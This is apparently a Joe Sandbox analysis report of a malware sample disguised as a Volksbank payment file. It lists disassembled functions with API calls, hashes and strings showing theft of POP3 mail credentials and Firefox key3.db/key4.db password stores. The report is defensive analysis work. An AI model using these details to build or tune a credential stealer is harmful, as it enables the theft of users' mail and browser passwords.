                                                                                                                                                                                                                                          • API String ID: 1999381814-0
                                                                                                                                                                                                                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                                          Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                                          Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                                          Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                                          • String ID: user_pref("
                                                                                                                                                                                                                                          • API String ID: 765841271-2487180061
                                                                                                                                                                                                                                          • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                          • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                                          Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                                                          • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                          • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                                          Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                          • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                                          • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                          • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                                          Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,7611E430,?), ref: 004081B9
                                                                                                                                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                                                                                                                                          • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                                          Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                                          • String ID: key3.db$key4.db
                                                                                                                                                                                                                                          • API String ID: 581844971-3557030128
                                                                                                                                                                                                                                          • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                          • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                                                          Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                                          • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                                          Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                                          • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                          • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                                          Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                          • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                                          • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                                          • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                                          • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                          • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                                          Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                                          • API String ID: 125969286-791839006
                                                                                                                                                                                                                                          • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                                                          Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                            • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                                          • String ID: ACD
                                                                                                                                                                                                                                          • API String ID: 1886237854-620537770
                                                                                                                                                                                                                                          • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
